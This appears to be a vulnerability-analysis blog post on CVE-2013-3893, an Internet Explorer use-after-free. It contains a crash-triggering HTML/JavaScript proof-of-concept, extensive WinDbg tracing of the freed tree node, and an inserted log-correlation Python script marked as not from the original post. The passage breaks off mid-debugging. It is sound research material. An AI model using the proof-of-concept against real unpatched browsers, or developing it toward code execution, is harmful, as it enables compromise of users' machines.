CVE-2013-3893

Posted by: Ox9A82
Posted on: 2016-08-22 21:48

Heads up!!! This post is fairly long, because I recorded the complete debugging process; anyone interested can read through it. If you don't have the patience, skip straight to the summary at the end :)

Microsoft Internet Explorer remote code execution vulnerability (CNNVD-201309-304)

Internet Explorer (IE) is a web browser developed by Microsoft and is the default browser shipped with the Windows operating system.
Microsoft IE versions 6 through 11 contain a remote code execution vulnerability in the SetMouseCapture implementation in mshtml.dll. The flaw arises because the program accesses an object in memory that has already been deleted or was never properly allocated. An attacker can exploit it by crafting a website and enticing a user to view it, executing arbitrary code in IE in the context of the current user and causing memory corruption. An attacker who successfully exploits this vulnerability gains the same user rights as the current user. If the current user is logged on with administrative rights, a successful attacker could take complete control of the affected system and could then install programs; view, change or delete data; or create new accounts with full user rights.

The PoC is as follows

<html>
<script>
function trigger()
{
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    document.body.appendChild(id_0);
    document.body.appendChild(id_1);
    id_1.applyElement(id_0);
    id_0.onlosecapture=function(e) {
        document.write("");
    }
    id_0['outerText']="";
    id_0.setCapture();
    id_1.setCapture();
}
window.onload = function() {
    trigger();
}
</script>
</html>

The program crashes as shown below; the value in edi triggers the exception. Analysis shows that the value of edi is passed down from the calling function, and that it points into a heap block that has already been freed. The debugger log follows.

1:021> g
(ed4.bd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=041ce6c8 ecx=05e00680 edx=041ce400 esi=00000000 edi=074a9fb0
eip=656c1f60 esp=041ce618 ebp=041ce620 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CDoc::HasContainerCapture+0x14:
656c1f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:074a9fb0=????????
1:021> !heap -p -a edi
    address 074a9fb0 found in
    _DPH_HEAP_ROOT @ 1201000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7392478:          74a9000             2000
    6b4890b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    771e5674 ntdll!RtlDebugFreeHeap+0x0000002f
    771a7aca ntdll!RtlpFreeHeap+0x0000005d
    77172d68 ntdll!RtlFreeHeap+0x00000142
    75a5f1ac kernel32!HeapFree+0x00000014
    656be590 mshtml!CTreeNode::Release+0x0000002d
    656d15b1 mshtml!CMarkup::UnloadContents+0x00000380
    656d2a8a mshtml!CMarkup::TearDownMarkupHelper+0x00000055
    656d2a15 mshtml!CMarkup::TearDownMarkup+0x00000049
    655b3b5e mshtml!COmWindowProxy::SwitchMarkup+0x000005a0
    65502bb4 mshtml!CDocument::open+0x00000426
    65500789 mshtml!CDocument::write+0x0000007c
    655b3267 mshtml!Method_void_SAFEARRAYPVARIANTP+0x00000085
    656e235c mshtml!CBase::ContextInvokeEx+0x000005dc
    656e25d5 mshtml!CBase::InvokeEx+0x00000025
    656edf9a mshtml!DispatchInvokeCollection+0x0000014c
    656a4998 mshtml!CDocument::InvokeEx+0x000000f0
    65693148 mshtml!CBase::VersionedInvokeEx+0x00000020
    65693104 mshtml!PlainInvokeEx+0x000000eb
    6b4ea22a jscript!IDispatchExInvokeEx2+0x00000104
    6b4ea175 jscript!IDispatchExInvokeEx+0x0000006a
    6b4ea3f6 jscript!InvokeDispatchEx+0x00000098
    6b4ea4a0 jscript!VAR::InvokeByName+0x00000139
    6b4fd8c8 jscript!VAR::InvokeDispName+0x0000007d
    6b4fd96f jscript!VAR::InvokeByDispID+0x000000ce
    6b4fe3e7 jscript!CScriptRuntime::Run+0x00002b80
    6b4f5c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6b4f5bfb jscript!ScrFncObj::Call+0x0000008d
    6b4f5e11 jscript!CSession::Execute+0x0000015f
    6b4ef3ee jscript!NameTbl::InvokeDef+0x000001b5
    6b4eea2e jscript!NameTbl::InvokeEx+0x0000012c
    65707af1 mshtml!CBase::InvokeDispatchWithThis+0x000001e1

Here we can see that edi is a pointer to an already-freed CTreeNode object. The stack backtrace is as follows

1:021> KV
ChildEBP RetAddr  Args to Child              
0428e510 656c1a82 00000000 069f4ff0 05538680 mshtml!CDoc::HasContainerCapture+0x14
0428e594 6573163d 0428e5b8 00000000 00000000 mshtml!CDoc::PumpMessage+0x3e4
0428e650 657f580d 0614fff0 00000001 069f4ff0 mshtml!CDoc::SetMouseCapture+0xe7
0428e678 654da5d0 07689fc8 0000ffff 0495bfd0 mshtml!CElement::setCapture+0x51
0428e6a0 656e235c 07689fc8 0495bfd0 07665fd8 mshtml!Method_void_oDoVARIANTBOOL+0xc5
0428e714 656ec75a 07689fc8 80010410 00000001 mshtml!CBase::ContextInvokeEx+0x5dc
0428e764 656ec79a 07689fc8 80010410 00000001 mshtml!CElement::ContextInvokeEx+0x9d
0428e790 65693104 07689fc8 80010410 00000001 mshtml!CInput::VersionedInvokeEx+0x2d
0428e7e4 6a58a22a 076abfd8 80010410 00000001 mshtml!PlainInvokeEx+0xeb
0428e820 6a58a175 06eb0d10 80010410 00000409 jscript!IDispatchExInvokeEx2+0x104
0428e85c 6a58a3f6 06eb0d10 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a
0428e91c 6a58a4a0 80010410 00000001 00000000 jscript!InvokeDispatchEx+0x98
0428e950 6a59d8c8 06eb0d10 0428e984 00000001 jscript!VAR::InvokeByName+0x139
0428e99c 6a59d96f 06eb0d10 00000001 00000000 jscript!VAR::InvokeDispName+0x7d
0428e9c8 6a59e3e7 06eb0d10 00000000 00000001 jscript!VAR::InvokeByDispID+0xce
0428eb64 6a595c9d 0428eb7c 00000000 0493ef88 jscript!CScriptRuntime::Run+0x2b80
0428ec4c 6a595bfb 00000000 00000000 0493cf70 jscript!ScrFncObj::CallWithFrameOnStack+0xce
0428ec94 6a5974ac 00000000 00000000 0493cf70 jscript!ScrFncObj::Call+0x8d
0428ed18 6a594ea4 06eb2fa0 06eb0d10 00000001 jscript!NameTbl::InvokeInternal+0x141
0428ed4c 6a59e3e7 06eb0d10 00000000 00000001 jscript!VAR::InvokeByDispID+0x17f

Looking at the call site

1:021> UB 656c1a82
mshtml!CDoc::PumpMessage+0x3c0:
656c1a5e 81a7580700007fffffff and dword ptr [edi+758h],0FFFFFF7Fh
656c1a68 57              push    edi
656c1a69 e8eafdffff      call    mshtml!CDoc::ReleaseDetachedCaptures (656c1858)
656c1a6e 837c242c00      cmp     dword ptr [esp+2Ch],0
656c1a73 7415            je      mshtml!CDoc::PumpMessage+0x444 (656c1a8a)
656c1a75 8b7c2410        mov     edi,dword ptr [esp+10h]
656c1a79 8b4c2414        mov     ecx,dword ptr [esp+14h]
656c1a7d e8c6040000      call    mshtml!CDoc::HasContainerCapture (656c1f48)

But this still tells us nothing about where the reuse happens; that is the hard part of analysing IE vulnerabilities, and it can only be understood by working through the execution flow.

We now have a hypothesis: the UAF object is the CTreeNode of some element, so we can try the generic CTreeNode breakpoints.

Break on creation: CTreeNode::CTreeNode; on release: CTreeNode::Release

bu mshtml!CTreeNode::Release "ln poi(poi(edx));.echo ==CTreeNode释放==;gc;"

Add helper statements to the PoC to aid debugging

Math.tan(3,4);
bu jscript!tan

Break on tan first, then set the logging breakpoint; this avoids interference from elements that are not part of the PoC.

1:021> g
(690d70e0)   mshtml!CPhraseElement::`vftable'   |  (690d7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(690d70e0)   mshtml!CPhraseElement::`vftable'   |  (690d7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(690fc2e8)   mshtml!CGenericElement::`vftable'   |  (69234ce0)   mshtml!CHeaderElement::`vftable'
Exact matches:
    mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
(690d70e0)   mshtml!CPhraseElement::`vftable'   |  (690d7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d3a8)   mshtml!CHeadElement::`vftable'   |  (6921d0d8)   mshtml!CHtmlElement::`vftable'
Exact matches:
    mshtml!CHeadElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d628)   mshtml!CTitleElement::`vftable'   |  (690d5900)   mshtml!CMetaElement::`vftable'
Exact matches:
    mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
(69245438)   mshtml!CScriptElement::`vftable'   |  (69245724)   mshtml!CScriptElement::DownLoadScript
Exact matches:
    mshtml!CScriptElement::`vftable' = <no type information>
==CTreeNode释放==
(69226670)   mshtml!CBodyElement::`vftable'   |  (69289108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>
==CTreeNode释放==
(6921d0d8)   mshtml!CHtmlElement::`vftable'   |  (6921d359)   mshtml!CHeadElement::CreateElement
Exact matches:
    mshtml!CHtmlElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8)   mshtml!CRootElement::`vftable'   |  (69288ba0)   mshtml!CDisplayPointer::`vftable'
Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8)   mshtml!CRootElement::`vftable'   |  (69288ba0)   mshtml!CDisplayPointer::`vftable'
Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
(6921a9a8)   mshtml!CRootElement::`vftable'   |  (69288ba0)   mshtml!CDisplayPointer::`vftable'
Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==

crashed....

This gives the complete CTreeNode release sequence; adding an r edx to the logging command lets us compare each freed object against the edi at the crash.

bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));gc;"

This time the address of each CTreeNode object is visible; compare it with the object address at the crash

1:021> g
==CTreeNode释放==
edx=10d34fb0
(6a0f70e0)   mshtml!CPhraseElement::`vftable'   |  (6a0f7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0a2a4fb0
(6a0f70e0)   mshtml!CPhraseElement::`vftable'   |  (6a0f7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=132dafb0
(6a11c2e8)   mshtml!CGenericElement::`vftable'   |  (6a254ce0)   mshtml!CHeaderElement::`vftable'
Exact matches:
    mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
edx=132dafb0
(6a11c2e8)   mshtml!CGenericElement::`vftable'   |  (6a254ce0)   mshtml!CHeaderElement::`vftable'
Exact matches:
    mshtml!CGenericElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0a2a4fb0
(6a0f70e0)   mshtml!CPhraseElement::`vftable'   |  (6a0f7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0d152fb0
(6a23d3a8)   mshtml!CHeadElement::`vftable'   |  (6a23d0d8)   mshtml!CHtmlElement::`vftable'
Exact matches:
    mshtml!CHeadElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628)   mshtml!CTitleElement::`vftable'   |  (6a0f5900)   mshtml!CMetaElement::`vftable'
Exact matches:
    mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628)   mshtml!CTitleElement::`vftable'   |  (6a0f5900)   mshtml!CMetaElement::`vftable'
Exact matches:
    mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13f3afb0
(6a23d628)   mshtml!CTitleElement::`vftable'   |  (6a0f5900)   mshtml!CMetaElement::`vftable'
Exact matches:
    mshtml!CTitleElement::`vftable' = <no type information>
==CTreeNode释放==
edx=13358fb0
(6a265438)   mshtml!CScriptElement::`vftable'   |  (6a265724)   mshtml!CScriptElement::DownLoadScript
Exact matches:
    mshtml!CScriptElement::`vftable' = <no type information>
==CTreeNode释放==
edx=07636fb0
(6a246670)   mshtml!CBodyElement::`vftable'   |  (6a2a9108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>
==CTreeNode释放==
edx=0e418fb0
(6a23d0d8)   mshtml!CHtmlElement::`vftable'   |  (6a23d359)   mshtml!CHeadElement::CreateElement
Exact matches:
    mshtml!CHtmlElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8)   mshtml!CRootElement::`vftable'   |  (6a2a8ba0)   mshtml!CDisplayPointer::`vftable'
Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8)   mshtml!CRootElement::`vftable'   |  (6a2a8ba0)   mshtml!CDisplayPointer::`vftable'
Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8)   mshtml!CRootElement::`vftable'   |  (6a2a8ba0)   mshtml!CDisplayPointer::`vftable'
Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>
(9bc.eb4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=03eee688 ecx=062fa680 edx=03eee3c0 esi=00000000 edi=07636fb0
eip=6a301f60 esp=03eee5d8 ebp=03eee5e0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CDoc::HasContainerCapture+0x14:
6a301f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:07636fb0=????????

The comparison shows that the UAF involves the CTreeNode belonging to the mshtml!CBodyElement object. For an exploit writer, the most important question about a UAF is the exact moment at which the object is freed; only once that is known can the freed slot be reclaimed.
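As an added example (not code from the original post), the following Python script automates the comparison just described: it parses the output of the logging breakpoint (the .echo marker, the r edx line and the ln lookup) together with the final access-violation dump, and reports which element's CTreeNode was freed at the address the faulting register still holds. The log text inside it is a constructed sample modelled on the output above, and the script also handles the case visible in the real log where the same address is released more than once.

```python
"""Correlate logged CTreeNode::Release events with the crashing register.

Added example for this post (not the author's code): automates comparing the
".echo / r edx / ln poi(poi(edx))" breakpoint output with the AV register dump.
"""
import re

# Constructed sample modelled on the WinDbg log in the post; addresses and
# symbols are illustrative, not a verbatim capture.
SAMPLE_LOG = """\
==CTreeNode释放==
edx=0a2a4fb0
(6a0f70e0)   mshtml!CPhraseElement::`vftable'   |  (6a0f7308)   mshtml!CBlockElement::`vftable'
Exact matches:
    mshtml!CPhraseElement::`vftable' = <no type information>
==CTreeNode释放==
edx=07636fb0
(6a246670)   mshtml!CBodyElement::`vftable'   |  (6a2a9108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8)   mshtml!CRootElement::`vftable'   |  (6a2a8ba0)   mshtml!CDisplayPointer::`vftable'
Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>
==CTreeNode释放==
edx=14ec8fb0
(6a23a9a8)   mshtml!CRootElement::`vftable'   |  (6a2a8ba0)   mshtml!CDisplayPointer::`vftable'
Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>
(9bc.eb4): Access violation - code c0000005 (first chance)
eax=00000000 ebx=03eee688 ecx=062fa680 edx=03eee3c0 esi=00000000 edi=07636fb0
eip=6a301f60 esp=03eee5d8 ebp=03eee5e0 iopl=0         nv up ei pl nz na po nc
mshtml!CDoc::HasContainerCapture+0x14:
6a301f60 8b0f            mov     ecx,dword ptr [edi]  ds:0023:07636fb0=????????
"""

MARKER = "==CTreeNode释放=="            # the .echo string in the breakpoint
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p)=([0-9a-fA-F]{8})")
# "Exact matches:" line of ln: the element class that owns the vtable.
VTABLE_RE = re.compile(r"^\s*(\w+)!(\w+)::`vftable'\s*=", re.M)
FAULT_RE = re.compile(r"ptr \[(e[a-z]{2})\]")   # memory operand, e.g. [edi]
SYMBOL_RE = re.compile(r"^(\w+!\S+):\s*$", re.M)


def parse_releases(text):
    """Return the logged CTreeNode::Release records, oldest first."""
    crash_at = text.find("Access violation")
    body = text if crash_at < 0 else text[:crash_at]
    records = []
    for seq, chunk in enumerate(body.split(MARKER)[1:], start=1):
        reg = REG_RE.search(chunk)          # the "r edx" output
        vt = VTABLE_RE.search(chunk)
        if reg is None or reg.group(1) != "edx":
            continue                        # incomplete record, skip it
        records.append({"seq": seq, "addr": int(reg.group(2), 16),
                        "klass": vt.group(2) if vt else None})
    return records


def parse_crash(text):
    """Extract the faulting register, its value and the crash symbol."""
    crash_at = text.find("Access violation")
    if crash_at < 0:
        return None
    tail = text[crash_at:]
    fault = FAULT_RE.search(tail)
    if fault is None:
        return None
    regs = {m.group(1): int(m.group(2), 16) for m in REG_RE.finditer(tail)}
    sym = SYMBOL_RE.search(tail)
    return {"reg": fault.group(1), "addr": regs.get(fault.group(1)),
            "symbol": sym.group(1) if sym else None}


def correlate(text):
    """Match the crash register value against every logged release."""
    crash = parse_crash(text)
    if crash is None or crash["addr"] is None:
        return None
    hits = [r for r in parse_releases(text) if r["addr"] == crash["addr"]]
    # Page-heap blocks get recycled, so one address can show up in several
    # releases; the most recent one is the object the dangling pointer meant.
    return {"crash": crash, "hits": hits, "culprit": hits[-1] if hits else None}


def report(text):
    """Human-readable one-liner for a triage note."""
    res = correlate(text)
    if res is None:
        return "no access violation with a register operand found"
    c = res["crash"]
    if res["culprit"] is None:
        return "%s=%08x at %s: no matching release logged" % (c["reg"], c["addr"], c["symbol"])
    k = res["culprit"]
    return "%s=%08x at %s -> freed CTreeNode of %s (release #%d of %d logged)" % (
        c["reg"], c["addr"], c["symbol"], k["klass"], k["seq"], len(parse_releases(text)))


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```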

 bu mshtml!CTreeNode::Release ".echo ==CTreeNode释放==;r edx;ln poi(poi(edx));.if(edx==07636fb0){}.else{gc;}"

But this turns out not to break, because the heap allocation differs on every run.

So I removed the gc and traced manually until

==CTreeNode释放==
edx=07636fb0
(6a246670)   mshtml!CBodyElement::`vftable'   |  (6a2a9108)   mshtml!CCaret::`vftable'
Exact matches:
    mshtml!CBodyElement::`vftable' = <no type information>

1:021> kv
ChildEBP RetAddr  Args to Child              
0437d520 6a310a05 0753ff64 0753ff30 0753ff30 mshtml!CTreeNode::Release (FPO: [0,0,0])
0437d584 6a3115b1 0753ff30 00000001 00000001 mshtml!CMarkup::DestroySplayTree+0x285
0437d5f0 6a312a8a 00000000 00000001 0753ff30 mshtml!CMarkup::UnloadContents+0x380
0437d60c 6a312a15 0753ff30 00000001 00000001 mshtml!CMarkup::TearDownMarkupHelper+0x55
0437d638 6a1f3b5e 00000001 00000001 076c8f30 mshtml!CMarkup::TearDownMarkup+0x49
0437d6a0 6a142bb4 076c8f30 00000000 00000003 mshtml!COmWindowProxy::SwitchMarkup+0x5a0
0437d79c 6a140789 060e2fc8 00000000 00000000 mshtml!CDocument::open+0x426
0437d818 6a1f3267 060e2fc8 08df5fe8 08c0cfd0 mshtml!CDocument::write+0x7c
0437d838 6a32235c 060e2fc8 08c0cfd0 08df1fd8 mshtml!Method_void_SAFEARRAYPVARIANTP+0x85
0437d8ac 6a3225d5 060e2fc8 0000041e 00000001 mshtml!CBase::ContextInvokeEx+0x5dc
0437d8d8 6a32df9a 060e2fc8 0000041e 00000001 mshtml!CBase::InvokeEx+0x25
0437d928 6a2e4998 060e2fc8 0000000b 0000041e mshtml!DispatchInvokeCollection+0x14c
0437d970 6a2d3148 060e2fc8 0000041e 00000001 mshtml!CDocument::InvokeEx+0xf0
0437d998 6a2d3104 060e2fc8 0000041e 00000001 mshtml!CBase::VersionedInvokeEx+0x20
0437d9ec 6c75a22a 08dbafd8 0000041e 00000001 mshtml!PlainInvokeEx+0xeb
0437da28 6c75a175 06ebad10 0000041e 00000409 jscript!IDispatchExInvokeEx2+0x104
0437da64 6c75a3f6 06ebad10 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a
0437db24 6c75a4a0 0000041e 00000001 00000000 jscript!InvokeDispatchEx+0x98
0437db58 6c76d8c8 06ebad10 0437db8c 00000001 jscript!VAR::InvokeByName+0x139
0437dba4 6c76d96f 06ebad10 00000001 00000000 jscript!VAR::InvokeDispName+0x7d

This backtrace does not actually reveal much, but it can serve as a reference later. Now, looking back at the PoC: createElement can be monitored by breaking on CElement::CElement, but appendChild is unfamiliar. What is certain is that this function is inherited from the CElement class.

; Attributes: bp-based frame

; public: long __stdcall CElement::appendChild(struct IHTMLDOMNode *, struct IHTMLDOMNode * *)
?appendChild@CElement@@QAGJPAUIHTMLDOMNode@@PAPAU2@@Z proc near

var_10= word ptr -10h
arg_0= dword ptr  8
arg_4= dword ptr  0Ch
arg_8= dword ptr  10h

mov     edi, edi
push    ebp
mov     ebp, esp
and     esp, 0FFFFFFF8h
sub     esp, 10h
push    esi
push    edi             ; pvarg
push    [ebp+arg_8]
xor     eax, eax
lea     edi, [esp+1Ch+var_10]
stosd
stosd
stosd
stosd
sub     esp, 10h
xor     eax, eax
mov     edi, esp
push    [ebp+arg_4]
inc     eax
push    [ebp+arg_0]
mov     [esp+34h+var_10], ax
lea     esi, [esp+34h+var_10]
movsd
movsd
movsd
movsd
call    ?insertBefore@CElement@@QAGJPAUIHTMLDOMNode@@UtagVARIANT@@PAPAU2@@Z ; CElement::insertBefore(IHTMLDOMNode *,tagVARIANT,IHTMLDOMNode * *)
lea     esi, [esp+18h+var_10]
mov     edi, eax
call    _VariantClear@4 ; VariantClear(x)
mov     eax, edi
pop     edi
pop     esi
mov     esp, ebp
pop     ebp
retn    0Ch
?appendChild@CElement@@QAGJPAUIHTMLDOMNode@@PAPAU2@@Z endp ; sp-analysis failed

From JavaScript we know that appendChild adds a child node to an element

Example:
var div=document.createElement("div");//create a new div element node
document.body.appendChild(div);//append the div node to the body node as its child, after body's existing children

Eventually, after a chain of calls, the function reaches CTreeNode::CTreeNode to initialise a CTreeNode object. Let's debug that process.

<html>
<script>
function trigger()
{
    Math.tan(3,4);
    var id_0 = document.createElement("sup");
    var id_1 = document.createElement("audio");
    Math.cos(3,4);
    document.body.appendChild(id_0);
    Math.sin(3,4);
    document.body.appendChild(id_1);
    Math.tan(3,4);

    id_1.applyElement(id_0);
    id_0.onlosecapture=function(e) {
        document.write("");
    }
    id_0['outerText']="";
    id_0.setCapture();
    id_1.setCapture();
}
window.onload = function() {
    trigger();
}
</script>
</html>

As shown above, helper debugging statements have been added to the PoC

Breakpoint 0 hit
eax=00000000 ebx=0411e380 ecx=00000005 edx=00000003 esi=0411e370 edi=0411e370
eip=6c77d8c0 esp=0411e274 ebp=0411e2b0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
jscript!tan:
6c77d8c0 ff258010756c    jmp     dword ptr [jscript!_imp__tan (6c751080)] ds:0023:6c751080={msvcrt!tan (773dde34)}
1:021> bu mshtml!CreateElement
Matched: 6a23d88c mshtml!CreateElement = <no type information>
Matched: 6a234bb0 mshtml!CreateElement = <no type information>
Ambiguous symbol error at 'mshtml!CreateElement'
1:021> bu 6a23d88c 
1:021> bu 6a234bb0 
1:021> bu jscript!cos
1:021> g
Breakpoint 2 hit
eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement:
6a234bb0 8bff            mov     edi,edi

Let's step through mshtml!CreateElement, which I already described in my earlier IE debugging notes

1:021> g
Breakpoint 2 hit
eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement:
6a234bb0 8bff            mov     edi,edi
1:021> p
Breakpoint 2 hit
eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement:
6a234bb0 8bff            mov     edi,edi
1:021> 
eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb2 esp=0425e67c ebp=0425e718 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x2:
6a234bb2 55              push    ebp
1:021> 
eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb3 esp=0425e678 ebp=0425e718 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x3:
6a234bb3 8bec            mov     ebp,esp
1:021> 
eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb5 esp=0425e678 ebp=0425e678 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
mshtml!CreateElement+0x5:
6a234bb5 83ec10          sub     esp,10h
1:021> 
eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb8 esp=0425e668 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x8:
6a234bb8 53              push    ebx
1:021> 
eax=0425e750 ebx=00000003 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bb9 esp=0425e664 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x9:
6a234bb9 8b5d10          mov     ebx,dword ptr [ebp+10h] ss:0023:0425e688=00000000
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bbc esp=0425e664 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0xc:
6a234bbc 56              push    esi
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bbd esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0xd:
6a234bbd c7451000000000  mov     dword ptr [ebp+10h],0 ss:0023:0425e688=00000000
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bc4 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CreateElement+0x14:
6a234bc4 85db            test    ebx,ebx
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bc6 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x16:
6a234bc6 0f84c67d0300    je      mshtml!CreateElement+0x18 (6a26c992)    [br=1]
1:021> 
eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a26c992 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x18:
6a26c992 bb08832a6a      mov     ebx,offset mshtml!g_Zero (6a2a8308)
1:021> 
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a26c997 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x1d:
6a26c997 e93082fcff      jmp     mshtml!CreateElement+0x1d (6a234bcc)
1:021> 
eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bcc esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x1d:
6a234bcc 0fb64701        movzx   eax,byte ptr [edi+1]       ds:0023:0425e6a9=60
1:021> 
eax=00000060 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=1a708808 edi=0425e6a8
eip=6a234bd0 esp=0425e660 ebp=0425e678 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
mshtml!CreateElement+0x21:
6a234bd0 c1e004          shl     eax,4
1:021> 
